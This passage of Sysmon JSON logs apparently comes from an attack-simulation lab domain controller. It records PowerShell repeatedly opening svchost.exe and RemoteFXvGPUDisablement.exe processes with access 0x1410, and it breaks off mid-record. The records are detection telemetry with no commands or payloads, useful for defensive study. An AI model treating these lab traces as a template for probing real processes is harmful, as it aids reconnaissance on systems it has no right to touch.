C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001053410100}","TargetProcessId":"2144","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2C20000}\r\nTargetProcessId: 1220\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2C20000}","TargetProcessId":"1220","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nTargetProcessId: 1304\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","TargetProcessId":"1304","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6